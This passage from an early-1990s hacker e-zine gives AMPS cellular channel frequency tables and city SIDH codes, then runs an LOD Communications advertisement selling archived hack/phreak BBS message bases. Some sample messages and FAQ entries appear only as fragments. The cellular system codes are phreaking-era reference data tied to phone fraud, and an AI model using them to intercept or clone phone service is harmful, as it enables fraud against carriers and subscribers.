Channel 4 (411) Tx 882.330 Rx 837.330
Channel 5 (432) Tx 882.960 Rx 837.960
Channel 6 (453) Tx 883.590 Rx 838.590
Channel 7 (474) Tx 884.220 Rx 839.220
Channel 8 (495) Tx 884.850 Rx 839.850
Channel 9 (516) Tx 885.480 Rx 840.480
Channel 10 (537) Tx 886.110 Rx 841.110
Channel 11 (558) Tx 886.740 Rx 841.740
Channel 12 (579) Tx 887.370 Rx 842.370
Channel 13 (600) Tx 888.000 Rx 843.000
Channel 14 (621) Tx 888.630 Rx 843.630
Channel 15 (642) Tx 889.260 Rx 844.260
Channel 16 (663) Tx 889.890 Rx 844.890
Cell # 16
--------------------------------------------------
Channel 1 (349) Tx 880.470 Rx 835.470
Channel 2 (370) Tx 881.100 Rx 836.100
Channel 3 (391) Tx 881.730 Rx 836.730
Channel 4 (412) Tx 882.360 Rx 837.360
Channel 5 (433) Tx 882.990 Rx 837.990
Channel 6 (454) Tx 883.620 Rx 838.620
Channel 7 (475) Tx 884.250 Rx 839.250
Channel 8 (496) Tx 884.880 Rx 839.880
Channel 9 (517) Tx 885.510 Rx 840.510
Channel 10 (538) Tx 886.140 Rx 841.140
Channel 11 (559) Tx 886.770 Rx 841.770
Channel 12 (580) Tx 887.400 Rx 842.400
Channel 13 (601) Tx 888.030 Rx 843.030
Channel 14 (622) Tx 888.660 Rx 843.660
Channel 15 (643) Tx 889.290 Rx 844.290
Channel 16 (664) Tx 889.920 Rx 844.920
Cell # 17
--------------------------------------------------
Channel 1 (350) Tx 880.500 Rx 835.500
Channel 2 (371) Tx 881.130 Rx 836.130
Channel 3 (392) Tx 881.760 Rx 836.760
Channel 4 (413) Tx 882.390 Rx 837.390
Channel 5 (434) Tx 883.020 Rx 838.020
Channel 6 (455) Tx 883.650 Rx 838.650
Channel 7 (476) Tx 884.280 Rx 839.280
Channel 8 (497) Tx 884.910 Rx 839.910
Channel 9 (518) Tx 885.540 Rx 840.540
Channel 10 (539) Tx 886.170 Rx 841.170
Channel 11 (560) Tx 886.800 Rx 841.800
Channel 12 (581) Tx 887.430 Rx 842.430
Channel 13 (602) Tx 888.060 Rx 843.060
Channel 14 (623) Tx 888.690 Rx 843.690
Channel 15 (644) Tx 889.320 Rx 844.320
Channel 16 (665) Tx 889.950 Rx 844.950
Cell # 18
--------------------------------------------------
Channel 1 (351) Tx 880.530 Rx 835.530
Channel 2 (372) Tx 881.160 Rx 836.160
Channel 3 (393) Tx 881.790 Rx 836.790
Channel 4 (414) Tx 882.420 Rx 837.420
Channel 5 (435) Tx 883.050 Rx 838.050
Channel 6 (456) Tx 883.680 Rx 838.680
Channel 7 (477) Tx 884.310 Rx 839.310
Channel 8 (498) Tx 884.940 Rx 839.940
Channel 9 (519) Tx 885.570 Rx 840.570
Channel 10 (540) Tx 886.200 Rx 841.200
Channel 11 (561) Tx 886.830 Rx 841.830
Channel 12 (582) Tx 887.460 Rx 842.460
Channel 13 (603) Tx 888.090 Rx 843.090
Channel 14 (624) Tx 888.720 Rx 843.720
Channel 15 (645) Tx 889.350 Rx 844.350
Channel 16 (666) Tx 889.980 Rx 844.980
Cell # 19
--------------------------------------------------
Channel 1 (352) Tx 880.560 Rx 835.560
Channel 2 (373) Tx 881.190 Rx 836.190
Channel 3 (394) Tx 881.820 Rx 836.820
Channel 4 (415) Tx 882.450 Rx 837.450
Channel 5 (436) Tx 883.080 Rx 838.080
Channel 6 (457) Tx 883.710 Rx 838.710
Channel 7 (478) Tx 884.340 Rx 839.340
Channel 8 (499) Tx 884.970 Rx 839.970
Channel 9 (520) Tx 885.600 Rx 840.600
Channel 10 (541) Tx 886.230 Rx 841.230
Channel 11 (562) Tx 886.860 Rx 841.860
Channel 12 (583) Tx 887.490 Rx 842.490
Channel 13 (604) Tx 888.120 Rx 843.120
Channel 14 (625) Tx 888.750 Rx 843.750
Channel 15 (646) Tx 889.380 Rx 844.380
Cell # 20
--------------------------------------------------
Channel 1 (353) Tx 880.590 Rx 835.590
Channel 2 (374) Tx 881.220 Rx 836.220
Channel 3 (395) Tx 881.850 Rx 836.850
Channel 4 (416) Tx 882.480 Rx 837.480
Channel 5 (437) Tx 883.110 Rx 838.110
Channel 6 (458) Tx 883.740 Rx 838.740
Channel 7 (479) Tx 884.370 Rx 839.370
Channel 8 (500) Tx 885.000 Rx 840.000
Channel 9 (521) Tx 885.630 Rx 840.630
Channel 10 (542) Tx 886.260 Rx 841.260
Channel 11 (563) Tx 886.890 Rx 841.890
Channel 12 (584) Tx 887.520 Rx 842.520
Channel 13 (605) Tx 888.150 Rx 843.150
Channel 14 (626) Tx 888.780 Rx 843.780
Channel 15 (647) Tx 889.410 Rx 844.410
Cell # 21
--------------------------------------------------
Channel 1 (354) Tx 880.620 Rx 835.620
Channel 2 (375) Tx 881.250 Rx 836.250
Channel 3 (396) Tx 881.880 Rx 836.880
Channel 4 (417) Tx 882.510 Rx 837.510
Channel 5 (438) Tx 883.140 Rx 838.140
Channel 6 (459) Tx 883.770 Rx 838.770
Channel 7 (480) Tx 884.400 Rx 839.400
Channel 8 (501) Tx 885.030 Rx 840.030
Channel 9 (522) Tx 885.660 Rx 840.660
Channel 10 (543) Tx 886.290 Rx 841.290
Channel 11 (564) Tx 886.920 Rx 841.920
Channel 12 (585) Tx 887.550 Rx 842.550
Channel 13 (606) Tx 888.180 Rx 843.180
Channel 14 (627) Tx 888.810 Rx 843.810
Channel 15 (648) Tx 889.440 Rx 844.440
SIDH CODES
CITY NON
WIRELINE WIRELINE
Abaline, TX 131 422
Aiken, GA 181 084
Akron, OH 073 054
Albany, GA 241 204
Albany, NY 063 078
Alburqueque, NM 079 110
Alexandria, VA 243 212
Allentown, PA 103 008
Alton, IL 017 046
Altoona, PA 247 032
Amarillo, TX 249 422
Anchorage, AK 251 234
Anderson, SC 139 116
Anniston, AL 255 098
Appleton, WI 217 240
Asheville, NC 263 246
Ashland, WV 307 xxx
Athens, AL 203 198
Athens, GA 041 034
Atlanta, GA 041 034
Atlantic City, NJ 267 250
Augusta, GA 181 084
Aurora, IL 001 020
Austin, TX 107 164
Bakersfield, CA 183 228
Baltimore, MD 013 018
Bangor, ME 271 254
Baton Rouge, LA 085 106
Battle Creek, MI 403 256
Beaumont, TX 185 012
Bellingham, WA 047 006
Beloit, WI 217 210
Benton Harbor, MI 277 260
Biddeford, ME 501 484
Billings, MT 279 262
Biloxi, MS 281 264
Binghampton, NY 283 266
Birmingham, AL 113 098
Bishop, CA 1063 xxx
Bismark, ND 285 268
Bloomington, IL 455 532
Boise, ID 289 272
Boston, MA 007 028
Bradenton, FL 175 042
Bremerton, WA 047 006
Bridgeport, CT 119 088
Bristol, TN 149 042
Brownsville, TX 451 434
Bryan, TX 297 280
Buffalo, NY 003 056
Burlington, NC 069 144
Burlington, VT 313 300
Canton, OH 073 054
Casper, WY 301 284
Cedar Falls, IA 589 568
Cedar Rapids, IA 303 286
Champaign, IL 305 532
Charleston, WV 307 290
Charleston, SC 127 156
Charlotte, NC 139 114
Charlottesville, VA 309 292
Chattanooga, TN 161 148
Chicago, IL 001 020
Cincinatti, OH 051 014
Clarksville, TN 179 296
Cleveland, OH 015 054
College Station, TX 297 280
Colorado Springs, CO 045 180
Columbia, SC 189 182
Columbus, GA 319 302
Columbus, OH 133 138
Corpus Christi, TX 191 184
Council BLuffs, IA 137 152
Cumberland, MD 321 304
Dallas, TX 033 038
Danville, VA 323 306
Davenport, IA 193 186
Dayton, OH 163 134
Daytona Beach, FL 325 308
Decatur, IL 327 532
Dennison, TX 033 038
Denver, CO 045 058
Des Moines, IA 195 150
Detroit, MI 021 010
Dotham, AL 329 312
Dubuque, IA 331 314
Duluth, MN 333 316
Durham, NC 069 144
Eau Claire, WI 335 318
Elgin, IL 001 020
El Paso, TX 097 092
Elkhart, IN 549 530
Elmira, NY 283 266
Enid, OK 341 324
Erie, PA 343 326
Eugene, OR 061 328
Evansville, IN 197 190
Fairbanks, AK --- 1018
Fargo, ND 347 330
Fayettesville, NC 349 100
Fayettesville, AR 607 342
Flint, MI 021 010
Florence, AL 351 334
Florence, SC 377 350
Fort Collins, CO 045 336
Fort Lauderdale, FL 037 024
Fort Myers, FL 355 042
Fort Pierce, FL 037 340
Fort Smith, AR 359 342
Fort Walton Beach, FL 361 344
Fort Wayne, IN 199 080
Fort Worth, TX 033 038
Fresno, CA 153 162
Gainesville, FL 365 348
Gadsden, AL 363 098
Galveston, TX 367 012
Glens Falls, NY 063 078
Grand Forks, ND 371 356
Grand Rapids, MI 021 244
Granite City, IL 017 046
Great Falls, MT 373 358
Greeley, CO 045 360
Green Bay, WI 217 362
Greensboro, NC 095 142
Greenville, SC 139 116
Gulf of Mexico, LA 171 194
Gulfport, MS --- 264
Gunterville, AL 203 198
Hagerstown, MD 381 364
Hamilton, OH 383 366
Harlingen, TX 451 434
Harrisburg, PA 159 096
Hartford, CT 119 088
Hickory, NC 385 368
Hilo, HI 1161 060
Holbrook, AZ 1027 ---
Honolulu, HI 167 060
Houma, LA 387 370
Houston, TX 035 012
Huntington, WV 307 196
Huntsville, AL 203 198
Indianapolis, IN 019 080
Iowa City, IA 389 286
Jackson, MI 391 374
Jackson, MS 205 160
Jacksonville, FL 075 136
Jacksonville, NC 393 376
Janesville, WI 217 210
Jerseyville, IL 245 586
Johnson City, TN 149 074
Johnstown, PA 039 032
Joliet, IL 001 020
Joplin, MO 401 384
Juneau, AK --- 1022
Kalamazoo, MI 403 386
Kankakee, IL 001 020
Kansas City, MO 059 052
Kennewick, WA --- 500
Killeen, TX 409 392
Kingsport, TN 149 074
Knoxville, TN 093 104
Kokomo, IN 411 080
LaCross, WI 413 396
Lafayette, IN 415 080
Lafayette, LA 431 414
Lake Charkes, LA 417 400
Lakeland, FL 175 042
Lancaster, PA 159 096
Lansing, MI 021 188
Laredo, TX 419 402
Las Cruces, NM 097 404
Las Vegas, NV 211 064
Lawrence, KS 059 406
Lawton, OK 425 408
Lewiston, ME 427 482
Lexington, KY 213 206
Lihue, HI 1157 060
Lincoln, NE 433 416
Little Rock, AR 215 208
Longview, TX 229 418
Lorain, OH 437 054
Los Angeles, CA 027 002
Louisville, KY 065 076
Lubbock, TX 439 422
Lynchburg, VA 441 424
Macon, GA 443 426
Madison, WI 217 210
Manchester, NH 445 428
Mansfield, OH 447 430
Marshall, TX 229 418
McAllen, TX 451 434
Medford, OR 061 436
Melbourne, FL 175 068
Memphis, TN 143 062
Miami, FL 037 024
Midland, TX 459 422
Millville, NH --- 250
Milwaukee, WI 005 044
Minneapolis, MN 023 026
Mobile, AL 081 120
Modesto, CA 233 224
Moline, IL 193 186
Monroe, LA 463 440
Monterey, CA 527 126
Montgomery, AL 465 444
Moorehead, ND --- 330
Muncie, IN 467 080
Muskegon, MI 021 448
Nashua, NH 445 428
Nashville, TN 179 118
New Bedford, MA 119 028
New Brunswick, NY 173 022
New Haven, CT 119 088
New Orleans, LA 057 036
Newport News, VA 083 168
New York, NY 025 022
Norfolk, VA 083 168
Ocala, FL 473 348
Odessa, TX 475 422
Oklahoma City, OK 169 146
Olympia, WA 047 006
Omaha, NE 137 152
Orange County, NY 479 486
Orlando, FL 175 068
Ottawa, IL 1177 1178
Oxnard, CA 027 002
Panama City, FL 483 462
Parkersburg, WV 485 032
Pascagoula, MS 487 264
Pasco, WA --- 500
Pensacola, FL 361 120
Peoria, IL 221 214
Petaluma, CA 031 040
Petersburg, VA 071 472
Philadelphia, PA 029 008
Phoenix, AZ 053 048
Pine Bluff, AR 493 208
Pittsburg, PA 039 032
Pittsfield, MA 119 480
Placerville, CA --- 1080
Ponce, PR 497 082
Portland, ME 499 482
Portland, OR 061 030
Portsmouth, NH 501 484
Poughkeepsie, NY 503 486
Providence, RI 119 028
Provo, UT 091 488
Pueblo, CO 045 490
Raleigh, NC 069 144
Rapid City, SD 511 494
Reading, PA 103 008
Redding, CA 513 294
Reno, NV 515 498
Richland, WA 517 500
Richmond, VA 071 170
Roanoke, VA 519 502
Rochester, NH 501 484
Rochester, MN 521 504
Rochester, NY 117 154
Rockford, IL 217 506
Sacramento, CA 129 112
Saginaw, MI 021 389
Salem, OR 061 030
Salinas, CA 527 040
Salt Lake City, UT 091 094
San Angelo, TX 529 510
San Antonio, TX 151 122
San Deigo, CA 043 004
San Francisco, CA 031 040
San Jose, CA 031 040
San Juan, PR 227 218
Santa Barbara, CA 531 040
Santa Cruz, CA 031 126
Santa Rosa, CA 031 040
Sarasota, FL 175 142
Savanna, GA 539 520
Schenectady, NY 063 078
Scranton, PA 103 172
Seattle, WA 047 006
Sharon, PA 089 126
Sheboygan, WI 543 044
Shreveport, LA 229 220
Sioux City, IA 547 528
Sioux Falls, SD 555 540
South Bend, IA 549 530
Spartanburg, SC 139 116
Spokane, WA 231 222
Springfield, IL 551 532
Springfield, MO 559 546
Springfield, OH 573 134
Springfield, MA 119 188
St. Cloud, MN 553 534
St. Joseph, MO 059 536
St. Louis, MO 017 046
St. Petersberg, FL 175 042
State College, PA 159 032
Stuebenville, OH 039 032
Stockton, CA 233 224
Stroudsburg, PA 103 172
Syracuse, NY 077 086
Tacoma, WA 047 006
Tallahassee, FL 565 544
Tampa, FL 175 042
Temple, TX 409 392
Terre Haute, IN 567 080
Texarkana, TX 229 550
Toledo, OH 021 130
Topeka, KS 059 552
Trenton, PA 029 008
Tucson, AZ 053 140
Tulsa, OK 111 166
Tuscaloosa, AL 577 098
Ukiah, CA 1075 ---
Utica, NY 235 226
Vallejo, CA 031 040
Victoria, TX 581 562
Vineland, NJ 583 250
Visalia, CA 153 162
Waco, TX 587 566
Warren, OH 089 126
Washington, DC 013 018
Waterloo, IA 589 568
Wausau, WI 591 570
West Palm Beach, FL 037 024
Wheeling, WV 039 032
Wichita Falls, TX 595 574
Wichita, KS 165 070
Wilkes Barr, PA 103 172
Williamsport, PA 103 576
Wilmington, DE 123 008
Wilmington, NC 599 578
Winston-Salem, NC 095 142
Worcester, MA 007 028
Yakima, WA 601 580
York, PA 159 096
Youngstown, OH 089 126
Yuba City, CA 129 112
Manufacturers' Addresses
Antel Corporation
400 Oser Avenus
Hauppauge, NY 11788
516-273-6800
Audiovox Corp.
150 marcus Blvd.
Hauppauge, NY 11788
516-231-7750
Blaupunkt
Robert Bosch Corp.
2800 S. 25th Avenue
Broadview, IL 60153
708-865-5200
DiamondTel
Mitsubishi Electronics of America
800 Biermann Court
Mt. Prospect, IL 60056
708-298-9223
Ericsson
P.O. Box 4248
Lynchburg, VA 24502
800-CAR-FONE
GE Mobile Communications
P.O. Box 4248
Lyunchburg, VA 24502
800-CAR-FONE
GoldStar
1850 W. Drake Drive
Tempe, AZ 85283
602-752-2200
Mitsubishi International
1500 Michael Drive, Suite B
Wood Dale, IL 60191
708-860-4200
Motorola, Inc.
1475 W. Shure Drive
Arlington Heights, IL 60004
708-632-5000
800-331-6456
Muratec
5560 Tennyson Parkway
Plano, TX 75024
214-403-3300
NovAtel
P.O. Box 1233
Fort Worth, TX 76101
817-847-2100
OKI Telecom
437 Old Peachtree Road
Suwanee, GA 30174
404-995-9800
Omni Cellular
96 S. Madison Street
Carthage, IL 62321
217-357-2308
Panasonic Communications
Two Panasonic Way
Secaucus, NJ 07094
201-348-7000
Panasonic Company
One Panasonic Way
Secaucus, NJ 07096
201-348-9090
Pioneer Electronics
2265 E. 220th Street
Long Beach, CA 90810
310-835-6177
Sanyo
21350 Lassen Street
Chatsworth, CA 91311
800-421-5013
818-998-7200
Shintom West
20435 South Western Avenue
Torrance, CA 90501
310-328-7200
Tandy Corp.
700 One Tandy Center
Fort Worth, TX 76102
817-390-3300
Technophone Corp.
1801 Penn Street, Suite 3
Melbourne, FL 32901
407-952-2100
If you have already seen some of the background information contained in the
following paragraphs, note that additional information has been added. The aim
was to make this file as self-contained as possible. It is approximately seven
pages in length (23K) and it should answer all of your questions.
The Project:
------------
Throughout history, physical objects have been preserved for posterity for
the benefit of the next generation of humans. Cyberspace, however, isn't very
physical; data contained on floppy diskettes has a finite lifetime as does the
technology to retrieve that data. The earliest underground hacker bulletin
board systems operated at a time when TRS-80s, Commodore 64s, and Apple ][s
were state-of-the-art. Today, it is difficult to find anyone who has one of
these machines in operating condition, not to mention the brain cells left to
recall how to operate them. :-(
LOD Communications has created a historical library of the "dark" portion of
Cyberspace. The project's goal is to acquire as much information as possible
from underground Hack/Phreak (H/P) bulletin boards that were in operation
during a decade long period, dating from the beginnings (in 1980/81 with 8BBS
and MOM: Modem Over Manhattan) to the legendary OSUNY, Plover-NET, Legion of
Doom!, Metal Shop, etc. up through the Phoenix Project circa 1989/90.
Currently, messages from over 50 different BBSes have been retrieved, although
very few message bases are 100% complete. However, not having a complete "set"
does not diminish their value.
- PARTICIPANTS who were on the various H/P BBSes may want to see their
contribution to history or reminisce about the "golden era" of hacking;
- ENTHUSIASTS who came into the "scene" after most of these boards were
down may want to see what they missed;
- COMPANIES who may want to see if their (or their competitors') phone
systems, computers, or networks were compromised;
- SCHOOLS AND UNIVERSITIES (including their libraries) who may want to use
the information for research in sociology or computer science as well as
for educational purposes in courses such as Computer Law, Computer
Ethics, and Computer Security;
- AUTHORS/PRESS who may want to finally get the facts straight about
"hackers;" and,
- THE CURIOUS PUBLIC who may want to sneak a peek into the inner realm of
the Computer Underground, especially those Restricted Access BBSes and
their Private sub-boards where only a small handful of "the best"
resided.
Were the individuals involved in the Computer Underground out to start World
War III, selling secrets to the Soviets, working with organized crime,
conspiring to do evil, or just a bunch of bored teenagers with nothing better
to do? How much did they know, and how did they find it out? Did they have
the capability to shut down phone service of Area Code portions? Could
they ruin someone's credit? Could they "move satellites in the heavens?"
Could they monitor packet switching network conversations or YOUR
conversations? The answers lie within the messages themselves.
As happens with most projects, the effort and monetary investment turned out
to be substantially more than originally anticipated. With all of the high-
tech equipment available today, people sometimes forget that in the early
1980s, 14.4K baud modems and 250 MB hard drives were just a fantasy for the
home computer user. Most messages Lodcom has recovered were downloaded at 300
baud onto 143K disk drives, with each file usually no larger than 15K in size.
One could not call a BBS and download the complete message base in 10 minutes
and save it into one file. Literally hundreds of man-hours have been spent
copying dusty Apple ][ disks, transferring them to IBM (or typing in hard copy
versions when electronic versions were unavailable), organizing over one
thousand individual files (thus far) according to what BBS the messages were
originally posted on, and splicing the files together. Also, after consulting
with the appropriate civil liberties organizations and our own legal counsel,
a slight editing of the messages (restricted to long distance access codes,
phone numbers, and computer passwords) had to be made to ensure that there is
nothing illegal contained within the messages. Every effort was made to keep
the messages in their pristine condition: 40 columns, ALL CAPS, spelling
errors, offensive language, inaccuracies of various kinds, and ALL.
One additional note: For those who purchase the Metal Shop Private Message
Base, 100% of the price ($4.00) will be donated to help pay for Craig Neidorf's
(Knight Lightning) Legal Defense bills (due to his successful campaign to
protect First Amendment rights for electronic publishing, i.e. the PHRACK/E911
case).
- The number of years ago that the BBS operated (affected availability);
- Whether the BBS or portions thereof were deemed "elite" and, therefore,
restricted access to a small number of users (affected availability);
and,
- A two page general message explaining H/P BBS terminology and format.
- The BBS Pro-Phile: A historical background and description of the BBS
either written by the original system operator(s) or those who actually
called the BBS when it was in operation (it took months to track the
appropriate people down and get them to write these specifically for
this project; lesser known BBSes may not contain a Pro-Phile);
It is anticipated that most people who are interested in the message bases
have never heard of a lot of the BBS names shown in the listing. If you have
seen one set of messages, you have NOT seen them ALL. Each system had a unique
personality, set of users, and each has something different to offer. If you
decide to order the minimum, we recommend that you mix a high-priced base
($7.00 or above) with a couple of medium-priced bases ($4.00 to $6.00) and a
few lower-priced bases ($1.00 to $3.00). This will provide you with a feel for
what was happening over a broad range of years and message quality. Of course,
nothing beats the full set (offered at a discount, see order form).
Due to the large size of the Message Base Files, they will be compressed
using the format of your choice. Please note that Lodcom does NOT include the
compression/decompression program (PKZIP, PAK, etc.). ASCII (decompressed)
files will be provided for $2.00 extra to cover additional diskette and
shipping costs. The files are available for:
Orders are expected to arrive at the requesters' physical mail box in 2-4
weeks upon receipt of the order.
ANSWER: We cannot say for sure. This is an ongoing effort and your support
will allow us to continue until we are satisfied with having
recovered the last decent scraps of messages out there. Assuming
there is a demand for these messages, all H/P BBSes of WORTH (i.e.
NON-"codez" and NON-"warez" systems) are expected to be offered by
the end of the Summer of 1993. A Guesstimate of what will be
offered is 80 to 100 Message Bases, half of which will be rather
partial. Orders are expected to be filled up until the end of 1993
although this may change. Regardless, we will send out
notification well in advance of ceasing operations.
QUESTION: "Can I help out? I have some old messages" (either on a C64,
Apple, IBM [best for us], or printout).
QUESTION: Say if I purchase BBS "X" which has 100 messages and the next
Version of your Price Listing shows BBS "X" now has 200 messages,
do I have to pay the for the first 100 all over again if I want
the other 100 messages?
ANSWER: No. If a small number of additional messages are added, they will
be sent for the price of a diskette and postage only, i.e. the
information will be free. If a larger number such as 100 new
messages are added, then if you previously purchased the message
base, the additional messages will be discounted. Those who pay
the Commercial Rate (corporations, government, etc.) will receive
updates of the purchased Volume for FREE regardless of how many new
messages there are, and LODCOM also pays for the postage and
diskette(s).
QUESTION: What if I purchase the minimum order now and, when the next
Version of the price list is released, I want to get more Message
Bases? Do I have to still pay the $20.00 minimum?
ANSWER: No. If you are a previous customer, the minimum is cut in half,
that is, $10.00. Commercial customers who bought Volume #1 (the
current "Complete Set"), are obviously not obligated to purchase
the added Message Bases (the next Volume).
QUESTION: I would really like to get a feel for what one or two of the
boards were like before I order them. Can I get more info?
If you do not have TELNET access to the Internet, AND your host will NOT
"bounce" a 50K file, Lodcom will send you the Sample Messages File if you
specifically request it.
LOD Communications (c) 1993: Price List of Hack/Phreak BBS Message Bases
----------------------------------------------------------------------------
BBS NAME A/C SYSOP(S) # MSGS DATES KBYTES PRICE
----------------------------------------------------------------------------
Alliance BBS 618 Phantom Phreaker 113 2/09/86 - 215 $ 3.00 B
Doom Prophet G,P 6/30/86
Black Ice Private 703 The Highwayman 880 12/1/88 - 580 $ 7.00 B
P,U 5/13/89
Metal Shop Private 314 Taran King 520 4/03/86 - 380 $ 4.00 BD
Knight Lightning P,R,U 5/06/87
In #msgs column, P indicates that the BBS was Private, R indicates BBS
was public but restricted access sub-board(s) are included, G indicates
that SOME (or maybe all) of the G-files written by the sysop and/or
files that were available on the BBS are included, U indicates that a
BBS Userlist (typically undated) is included.
DATES column shows the starting and ending dates for which messages
were buffered (and therefore available) although there may be some gaps
in the chronological order.
LODCOM is currently organizing and splicing messages from over 30 more H/P
BBSes [shown below] and, as the files are completed and/or as additional
messages are procured for the above systems, updates of this listing will be
released. Next release is expected some time in JUNE of 1993: Modem Over
Manhattan (MOM), 8BBS (213), Mines of Moria (713), Pirates Cove (516) sysop:
BlackBeard, Catch-22 (617) sysop: Silver Spy, Phreak Klass 2600 (806) sysop:
The Egyptian Lover, Blottoland (216) sysop: King Blotto, Osuny 2 (a.k.a. The
Crystal Palace) (914), The Hearing Aid, Split Infinity (408), (303) sysop: The
ShadowMaster, ShadowSpawn (219) sysop: Psychic Warlord, IROC (817) sysop: The
Silver Sabre, FreeWorld II (301) sysop: Major Havoc, Planet Earth, Ripco (312)
sysop: Dr. Ripco, Hackers Heaven (217) sysop: Jedi Warrior, Demon Roach
Underground (806) sysop: Swamp Ratte, Stronghold East Elite (516) sysop: Slave
Driver, Pure Nihilism, 5th Amendment (713) sysop: Micron, Newsweek Elite (617)
sysop: Micro Man, Lunatic Labs (415) sysop: The Mad Alchemist, Laser Beam
(314), Hackers Den (718) sysop: Red Knight, The Freezer (305) sysop: Mr. Cool,
The Boca Harbour (305) sysop: Boca Bandit, The Armoury (201) sysop: The Mace,
Digital Logic's Data Center (305) sysop: Digital Logic, Asgard (201), The KGB,
Planet Earth (714), PBS (702), Lost City of Atlantis sysop: The Lineman, and
more.
Along with the above H/P BBS Message Bases, LODCOM has collected many of the
old "philes" that were written and disseminated over the years. A list of all
of them would take up too much space here, however, we can tell you that the
majority are NOT files that were originally written for electronic newsletters
such as Phrack, PHUN, ATI, etc. (with the perhaps obvious exception of the
LOD/H Technical Journal). Those files/newsletters are readily available from
other sources. This hodgepodge of files includes files from Bioc Agent 003,
Legion of Doom members, and many others that somehow fell out of widespread
circulation. A Table of Contents of the collection is included but the
tutorials are all grouped together in four large files of approximately 250K
each. This collection will have additions with each update of this file. See
the order form for the price (price will go up as more files are added).
The Order Form:
---------------
- - - - - - - - - - - - - - - C U T - H E R E - - - - - - - - - - - - - - - -
File Archive Method (.ZIP [preferred], .ARJ, .LHZ, .Z, .TAR) ____________
(ASCII [Non-Compressed] add $2.00 to order)
By purchasing these works, the Purchaser agrees to abide by all applicable U.S.
Copyright Laws to not distribute or reproduce, electronically or otherwise, in
part or in whole, any part of the Work(s) without express written permission
from LOD Communications.
Send To:
Name: _____________________________________
Street: _____________________________________
City/State/Zip: _____________________________________
Country: _____________________________________
- - - - - - - - - - - - - - - C U T - H E R E - - - - - - - - - - - - - - - -
Email: [email protected]
Voice Mail: 512-448-5098
Snail Mail: LOD Communications
603 W. 13th
Suite 1A-278
Austin, Texas USA 78701
==Phrack Magazine==
In order to provide a better feeling for the content of what the LOD
Communications Underground Hack/Phreak BBS Message Base Archives contain, 31
messages were selected from the overall collection of posts for 5 Boards.
Note that the samples contained herein are fairly typical and are but a very
small fraction of the 5000+ messages from over 50 systems that LODCOM currently
possesses. Additional BBS's and messages are being added constantly. Consult
the Price Listing [First Version due to be released in Late April 1993 and
periodic additions thereafter] for an up-to-date catalog of our holdings and
costs (minimal).
8BBS (213) Circa 1980/81, Modem Over Manhattan (MOM), Twilight Phone (1982),
Legion of Doom! (305) sysop: Lex Luthor, Plover-NET (516) sysop: Quasi Moto,
Sherwood Forest II (914) co-sysop: Bioc Agent 003, Alliance BBS (618) sysop:
Phantom Phreaker, Catch-22 (617) sysop: Silver Spy, Blottoland (216) sysop:
King Blotto, Osuny 2 (aka The Crystal Palace) (914), Mines of Moria (713),
Pirates Cove (516) sysop: BlackBeard, The Hearing Aid, Split Infinity (408),
Farmers of Doom! (303) sysop: Mark Tabas, Shadowland (303) sysop: The
ShadowMaster, Metal Shop Private (314) sysops: Taran King and Knight Lightning,
ShadowSpawn (219) sysop: Psychic Warlord, IROC, FreeWorld II (301), Planet
Earth (714), The C.O.P.S. (305), Ripco (312) sysop: Dr. Ripco, Hackers Heaven
(217) sysop: Jedi Warrior, Demon Roach Underground, Stronghold East Elite (516)
cosysop: Slave Driver, Pure Nihilism, 5th Amendment (713), Newsweek Elite
(617), Phreak Klass 2600 (806), Lunatic Labs (415), Laser Beam (314), Hackers
Den, The Freezer (305) sysop: Mr. Cool, The Boca Harbour (305) sysop: Boca
Bandit, The Armoury (201) sysop: The Mace, Digital Logic (305), Asgard (201),
The CIA bbs, The KGB bbs, Face to Face (1990), Broadway Show (718) Sysop:
Broadway Hacker, The Safehouse (612) circa 1983/4, Lost City of Atlantis (215),
The Private Sector (2600 sponsor BBS), and more.
*** {OSUNY (914) Sysop(s): Tom Tone and Milo Phonbil (both wrote for TAP)} ***
*** {Osuny is perhaps the most legendary Phreak Board of all time} ***
Msg.:118
Date:10/5/82
From:MILO PHONBIL
To:ALL
About:STANFORD STUFF
Msg. :180
About :MAINFRAMES
>From :DATA BANDIT
To :ALL PHREAKS
Date :2/23/83 00:00
---------------\-/-----------------
?
MEMBER P.H.A.
Msg. :396
About :PHREAK BBS ON THE SOURCE!!!
>From :MAXWELL WILKE
To :ALL
Date :3/25/83
later,
MW
Msg. :476
About :BAD NEWS
>From :THE HACKER
To :ALL
Date :4/8/83
THE
HACKER
Msg. :519
About :SPRINT/MCI/OTHER BUGGERS
>From :ROGER OLSON
To :ALL
Date :4/17/83
Msg.: 211
Date: 10/17/82
From: ROBERT ALLEN
To: ALL
About: WHITE HOUSE
DIAL ANYWHERE,
BUT DIAL WITH CARE
--BOB--
Msg. :111
About :***WARNING!!!***
>From :JIMMY HOFFA
To :***PHELLOW-PHREAKERS***
Date :2/19/83 00:00
_____________________________________________________________________________
*** {WOPR (617) SYSOP: Terminal Man. WOPR was a private phreak board and} ***
*** {was considered one of the best H/P systems of the time. The} ***
*** {following Messages are from 1984 unless stated otherwise} ***
TO ALL MY SUBJECTS:
KING BLOTTO
---------------------------------
69> COSMOS & UNIX
---------------------------------
Msg left by: BIOC AGENT 003
Date posted: MON AUG 6 11:18:23 AM
Excelsior,
---------------------------------
1-79 LAST=69
[E]mail
[A]bort
[T]itles
:
---------------------------------
78> Intro To C Search
---------------------------------
Msg left by: LORD DIGITAL
Date posted: FRI AUG 17 6:20:13 AM {1984}
Instructions :>
Pretty simple, all you do is: Uplo
ad the text file, use the CC (Compile
C) utility, which will give you th
e "a.out" (assembly out), now just
rename the file (mv) to whatever y
ou wish to call it...
later-
---------------------------------
1-90 LAST=78
[E]mail
[A]bort
[T]itles
:
---------------------------------
83> the old fashioned way...
---------------------------------
Msg left by: BIG BROTHER
Date posted: FRI AUG 17 10:36:45 PM
1-90 LAST=83
[E]mail
[A]bort
[T]itles
:
---------------------------------
85> Pissed As SHIT!
---------------------------------
Msg left by: SHARP RAZOR
Date posted: SAT AUG 18 4:09:16 AM
1-90 LAST=85
[E]mail
[A]bort
[T]itles
:
later,
Paul Muad'Dib
Legion
of
Doom
---------------------------------
MESSAGE #81: HACK-A-TRIP
---------------------------------
Msg left by: BROADWAY HACKER
Date posted: TUE JUL 24 8:24:02 PM
Hack-a-trip
---------------------------------
MESSAGE #63: ARGGGH!
---------------------------------
Msg left by: KARL MARX
Date posted: SAT JUL 21 4:14:43 PM
____
_____________________________________________________________________________
*** {Samples from the Phoenix Project BBS (512), Sysop: The Mentor} ***
*** {As many are aware, the Phoenix Project was one of the intended} ***
*** {targets in the Hacker Crackdown of 1990 and was erroneously} ***
*** {affiliated to Steve Jackson Games' Illuminati BBS} ***
8/60: Autonet...
